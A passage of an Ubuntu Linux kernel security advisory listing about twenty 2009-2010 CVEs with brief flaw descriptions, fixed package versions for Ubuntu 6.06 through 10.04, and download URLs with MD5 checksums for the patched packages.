CVE-2010-1085,\nCVE-2010-1086, CVE-2010-1087, CVE-2010-1088, CVE-2010-1146,\nCVE-2010-1148, CVE-2010-1162, CVE-2010-1187, CVE-2010-1188,\nCVE-2010-1488\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 9.04\nUbuntu 9.10\nUbuntu 10.04 LTS\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.84\n  linux-image-2.6.15-55-686       2.6.15-55.84\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.84\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.84\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.84\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.84\n  linux-image-2.6.15-55-hppa32    2.6.15-55.84\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.84\n  linux-image-2.6.15-55-hppa64    2.6.15-55.84\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.84\n  linux-image-2.6.15-55-itanium   2.6.15-55.84\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.84\n  linux-image-2.6.15-55-k7        2.6.15-55.84\n  linux-image-2.6.15-55-mckinley  2.6.15-55.84\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.84\n  linux-image-2.6.15-55-powerpc   2.6.15-55.84\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.84\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.84\n  linux-image-2.6.15-55-server    2.6.15-55.84\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.84\n  linux-image-2.6.15-55-sparc64   2.6.15-55.84\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.84\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-28-386       2.6.24-28.70\n  linux-image-2.6.24-28-generic   2.6.24-28.70\n  linux-image-2.6.24-28-hppa32    2.6.24-28.70\n  linux-image-2.6.24-28-hppa64    2.6.24-28.70\n  linux-image-2.6.24-28-itanium   2.6.24-28.70\n  linux-image-2.6.24-28-lpia      2.6.24-28.70\n  linux-image-2.6.24-28-lpiacompat  2.6.24-28.70\n  linux-image-2.6.24-28-mckinley  2.6.24-28.70\n  linux-image-2.6.24-28-openvz    2.6.24-28.70\n  linux-image-2.6.24-28-powerpc   2.6.24-28.70\n  linux-image-2.6.24-28-powerpc-smp  2.6.24-28.70\n  linux-image-2.6.24-28-powerpc64-smp  2.6.24-28.70\n  linux-image-2.6.24-28-rt        2.6.24-28.70\n  linux-image-2.6.24-28-server    2.6.24-28.70\n  linux-image-2.6.24-28-sparc64   2.6.24-28.70\n  linux-image-2.6.24-28-sparc64-smp  2.6.24-28.70\n  linux-image-2.6.24-28-virtual   2.6.24-28.70\n  linux-image-2.6.24-28-xen       2.6.24-28.70\n\nUbuntu 9.04:\n  linux-image-2.6.28-19-generic   2.6.28-19.61\n  linux-image-2.6.28-19-imx51     2.6.28-19.61\n  linux-image-2.6.28-19-iop32x    2.6.28-19.61\n  linux-image-2.6.28-19-ixp4xx    2.6.28-19.61\n  linux-image-2.6.28-19-lpia      2.6.28-19.61\n  linux-image-2.6.28-19-server    2.6.28-19.61\n  linux-image-2.6.28-19-versatile  2.6.28-19.61\n  linux-image-2.6.28-19-virtual   2.6.28-19.61\n\nUbuntu 9.10:\n  linux-image-2.6.31-112-imx51    2.6.31-112.28\n  linux-image-2.6.31-214-dove     2.6.31-214.28\n  linux-image-2.6.31-214-dove-z0  2.6.31-214.28\n  linux-image-2.6.31-22-386       2.6.31-22.60\n  linux-image-2.6.31-22-generic   2.6.31-22.60\n  linux-image-2.6.31-22-generic-pae  2.6.31-22.60\n  linux-image-2.6.31-22-ia64      2.6.31-22.60\n  linux-image-2.6.31-22-lpia      2.6.31-22.60\n  linux-image-2.6.31-22-powerpc   2.6.31-22.60\n  linux-image-2.6.31-22-powerpc-smp  2.6.31-22.60\n  linux-image-2.6.31-22-powerpc64-smp  2.6.31-22.60\n  linux-image-2.6.31-22-server    2.6.31-22.60\n  linux-image-2.6.31-22-sparc64   2.6.31-22.60\n  linux-image-2.6.31-22-sparc64-smp  2.6.31-22.60\n  linux-image-2.6.31-22-virtual   2.6.31-22.60\n  linux-image-2.6.31-307-ec2      2.6.31-307.15\n\nUbuntu 10.04 LTS:\n  linux-image-2.6.31-608-imx51    2.6.31-608.14\n  linux-image-2.6.31-802-st1-5    2.6.31-802.4\n  linux-image-2.6.32-205-dove     2.6.32-205.18\n  linux-image-2.6.32-22-386       2.6.32-22.35\n  linux-image-2.6.32-22-386-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-generic   2.6.32-22.35\n  linux-image-2.6.32-22-generic-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-generic-pae  2.6.32-22.35\n  linux-image-2.6.32-22-generic-pae-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-ia64      2.6.32-22.35\n  linux-image-2.6.32-22-ia64-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-lpia      2.6.32-22.35\n  linux-image-2.6.32-22-lpia-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc   2.6.32-22.35\n  linux-image-2.6.32-22-powerpc-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc-smp  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc-smp-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc64-smp  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc64-smp-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-preempt   2.6.32-22.35\n  linux-image-2.6.32-22-preempt-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-server    2.6.32-22.35\n  linux-image-2.6.32-22-server-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-sparc64   2.6.32-22.35\n  linux-image-2.6.32-22-sparc64-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-sparc64-smp  2.6.32-22.35\n  linux-image-2.6.32-22-sparc64-smp-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-versatile  2.6.32-22.35\n  linux-image-2.6.32-22-versatile-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-virtual   2.6.32-22.35\n  linux-image-2.6.32-306-ec2      2.6.32-306.11\n  linux-image-2.6.33-501-omap     2.6.33-501.7\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. \n\nDetails follow:\n\nIt was discovered that the Linux kernel did not correctly handle memory\nprotection of the Virtual Dynamic Shared Object page when running\na 32-bit application on a 64-bit kernel. (Only affected Ubuntu 6.06\nLTS.) (CVE-2009-4271)\n\nIt was discovered that the r8169 network driver did not correctly check\nthe size of Ethernet frames.  A remote attacker could send specially\ncrafted traffic to crash the system, leading to a denial of service. \n(CVE-2009-4537)\n\nWei Yongjun discovered that SCTP did not correctly validate certain\nchunks.  A remote attacker could send specially crafted traffic to\nmonopolize CPU resources, leading to a denial of service. (Only affected\nUbuntu 6.06 LTS.) (CVE-2010-0008)\n\nIt was discovered that KVM did not correctly limit certain privileged\nIO accesses on x86.  Processes in the guest OS with access to IO regions\ncould gain further privileges within the guest OS. (Did not affect Ubuntu\n6.06 LTS.) (CVE-2010-0298, CVE-2010-0306, CVE-2010-0419)\n\nEvgeniy Polyakov discovered that IPv6 did not correctly handle\ncertain TUN packets. (Only affected Ubuntu 8.04\nLTS.) (CVE-2010-0437)\n\nSachin Prabhu discovered that GFS2 did not correctly handle certain locks. \nA local attacker with write access to a GFS2 filesystem could exploit\nthis to crash the system, leading to a denial of service. (CVE-2010-0727)\n\nJamie Strandboge discovered that network virtio in KVM did not correctly\nhandle certain high-traffic conditions.  A remote attacker could exploit\nthis by sending specially crafted traffic to a guest OS, causing the\nguest to crash, leading to a denial of service. (Only affected Ubuntu\n8.04 LTS.) (CVE-2010-0741)\n\nMarcus Meissner discovered that the USB subsystem did not correctly handle\ncertain error conditions.  A local attacker with access to a USB device\ncould exploit this to read recently used kernel memory, leading to a\nloss of privacy and potentially root privilege escalation. (CVE-2010-1083)\n\nNeil Brown discovered that the Bluetooth subsystem did not correctly\nhandle large amounts of traffic. (Ubuntu\n6.06 LTS and 10.04 LTS were not affected.) (CVE-2010-1084)\n\nJody Bruchon discovered that the sound driver for the AMD780V did not\ncorrectly handle certain conditions. (CVE-2010-1085)\n\nAng Way Chuang discovered that the DVB driver did not correctly handle\ncertain MPEG2-TS frames.  An attacker could exploit this by delivering\nspecially crafted frames to monopolize CPU resources, leading to a denial\nof service. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1086)\n\nTrond Myklebust discovered that NFS did not correctly handle truncation\nunder certain conditions.  A local attacker with write access to an NFS\nshare could exploit this to crash the system, leading to a denial of\nservice. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1087)\n\nAl Viro discovered that automount of NFS did not correctly handle symlinks\nunder certain conditions. (Ubuntu 6.06 LTS and Ubuntu\n10.04 LTS were not affected.) (CVE-2010-1088)\n\nMatt McCutchen discovered that ReiserFS did not correctly protect xattr\nfiles in the .reiserfs_priv directory. (CVE-2010-1146)\n\nEugene Teo discovered that CIFS did not correctly validate arguments when\ncreating new files.  A local attacker could exploit this to crash the\nsystem, leading to a denial of service, or possibly gain root privileges\nif mmap_min_addr was not set. (CVE-2010-1148)\n\nCatalin Marinas and Tetsuo Handa discovered that the TTY layer did not\ncorrectly release process IDs. (CVE-2010-1162)\n\nNeil Horman discovered that TIPC did not correctly check its internal\nstate.  A local attacker could send specially crafted packets via AF_TIPC\nthat would cause the system to crash, leading to a denial of service. \n(Ubuntu 6.06 LTS was not affected.) (CVE-2010-1187)\n\nMasayuki Nakagawa discovered that IPv6 did not correctly handle\ncertain settings when listening. (Only Ubuntu 6.06 LTS was affected.) (CVE-2010-1188)\n\nOleg Nesterov discovered that the Out-Of-Memory handler did not correctly\nhandle certain arrangements of processes. (CVE-2010-1488)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.diff.gz\n      Size/MD5:  2960435 33b09ecaf8a52ac8518c34163d53c5ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.dsc\n      Size/MD5:     2439 ddd8f898074d4b56e18fa00cecaed4d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.84_all.deb\n      Size/MD5:  5166142 6bb2a7cc886f5f258e598f8257386c4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.84_all.deb\n      Size/MD5:    96900 4d56e3ffc13abbd559252d961582928e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84_all.deb\n      Size/MD5: 44742758 a29467cb2571e45b5ba4cc52f49d402e\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    22344 22df0e2142b58bfc5089997ba68f8a32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    44772 e38fce9b303eb280f9de5b6bf4321539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     2312 519dde14b25bcb6f72b50b10fb2b8c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    36298 529530b75bc9d308a36945e253829337\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   102370 db98ff5f9e6e356af90422da4190fcba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    38890 0d2cb99466cf014ba83ad3a38cd759f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    49144 7e51d739d81751a717fd33393d9b5698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   176620 61c26ebee2f9b56ab2ae781caaa78f16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    36774 32797f4fc4204eeb5185a17019dc5cd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   142346 50314cb83693e27a2f515836bfb81adf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    51062 c7f26b13e057743d95d90c6ed1feb7be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   140712 60824c117e8e10faa8502405dc64b756\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   287612 e599c71e4f9f791bfcbb5a8e148fa02d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    97832 923d2dbedfa2bb0ce20db2af510ec3ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1652310 a49bd3692b26b2776eddd3218049ad31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb\n      Size/MD5:   869218 c54b14fff14e6f36a6f5424bf28ba5ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb\n      Size/MD5:   868510 e7741f1995f864eea030c242abac8085\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb\n      Size/MD5:   871276 ad7e3f9695e48c13d78024d9cebb4bdc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb\n      Size/MD5:   870704 c3dd9b5335fa41ab82df7f691cee2a46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_amd64.deb\n      Size/MD5:  6925588 e85a966dd3fd31a092a504e4c4383820\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb\n      Size/MD5: 20817472 f8e7d44b2a3bd9dc72917fd16c2628ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb\n      Size/MD5: 20798306 fe88a926a6ce4b4465ad88a493a48357\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb\n      Size/MD5: 21635330 8174ddfff1140d94b76678739c9f15c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb\n      Size/MD5: 19905746 58501fc8aca4794202804578b4e29415\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    15626 94656d1862678ee9b6a3a62f90919629\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   240372 faf0cd25cfd49759685f8a9b725e305d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   202684 fec1b04e98e48c0e354e9a47cb00d601\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1048610 a5ff74bb5b40c0b6929d535abade30be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1543792 217e245037c3d6c48687b594c932025b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   161696 969b188d1e7f285fc30f39e17ebd349b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     9834 c6278cf04b4dbb788d0eebaf599c005e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    80872 2fb47b12ddf5767a51bdc1d4e1f05e52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    49294 f27115bb56ba683c95c915de40a46afc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    35162 4e92b8742d5ad65bf0d915d9c216c4ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    70894 c7525221ee4847b254c1839cdd4d0b31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     6220 8d1ee1256a6d3942c10dd7731bd34d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     9062 f120989e7b729addea0a373b6c6b81a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    57922 16f0dd4d6e989ec1684074667b9c1133\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   123378 b2797adf33289dd9c99525971a8d001b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   101080 0b923143d4fb260149446550b64529d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    79278 950ccff4d598e5f9c62d4ffcea1b4b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1595422 5d2e9b2d898d39363c3cab3c67391c0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    72356 2fdf60644e4d13a5c9732d48e3b6b025\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    12648 7a5b7c88d879c5f8611add807b77dff5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    33808 f48b8b878206b3f559826c9177935c7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   138510 27d844c2fc790a35b13b9b68c0748ec0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    38938 c50f0d87787aacbb068bd4bfac99a953\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   278876 09d4db859ee11c8c17a5c755a38e103c\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    18976 1d3b491a97a3cafd02b9492bbf7f320c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    43488 3592e8676adb913653d31fd7d9254ab6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   105206 87f8b212932688293624f3c1e59c315e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     2286 a8cbb01c110d4788b8464a3ff357a6d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    34576 0d581950d36489a0ebc2e7aa43871105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    97044 3e789df7024c53456caf5ce65a095c3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    37132 fb21ce86da4297933bdd3acaeb02568a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    44126 a0e10d7f107c376bd0376cbeb7589d12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   167738 d6417b63d8c5511f21bc7857b1e6ef23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    33950 d833056cd1d32851c93cc61d3780b258\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   137978 3c251b1f57940da0f22e496ab4d9f6d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    46902 a916219f56dc797576f7cdf42535fe44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   133154 fdfe5b2d21ec36137e19d638cec2a39d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   273800 05e8313fec49c11084adb52deb26878d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   102328 ce88505cda9ff607c7bb685c60a4fb75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1597794 7a8768bb650b30137362b93c9aa2e4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.84_i386.deb\n      Size/MD5:   857150 2de1fda09c98f8c7c0f5bb5adaf4dade\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.84_i386.deb\n      Size/MD5:   858572 83f459c63da9ce886855913a4012edf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.84_i386.deb\n      Size/MD5:   859816 5fb638b3b741914410eb7fb331dc352e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb\n      Size/MD5:   861156 732a23b93ee499deda765ee8dcd66346\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.84_i386.deb\n      Size/MD5:   860324 57519a85aad5ad19b617c4676f28d7f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_i386.deb\n      Size/MD5:  6918250 084d1cf58595b1cbadcbd7f16dc39756\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.84_i386.deb\n      Size/MD5: 21724888 f5fca5f423472946432ed46a990c1ddf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.84_i386.deb\n      Size/MD5: 22517998 6ef9d114c0f9989e9e5a0a6d4af64cd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.84_i386.deb\n      Size/MD5: 22265884 1ee20e38ac15055088248b99fe684e43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb\n      Size/MD5: 23627106 b63abff51aa83dc377d5eb9235972302\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.84_i386.deb\n      Size/MD5: 23179652 98de15fe41e4afa4100f6105b8003f8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    15510 9190bfcba4e54f10b48d3419f7c3d368\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   238512 1ab04364f536a96b5c2a127765f496da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   197142 3f27653e150b8dba0ee8b187d8826f5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1048396 03a161c4b52eb41c6d401133cd32557b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1741516 b42acfc4c67ddc9f0ee62bca1b54974e\n    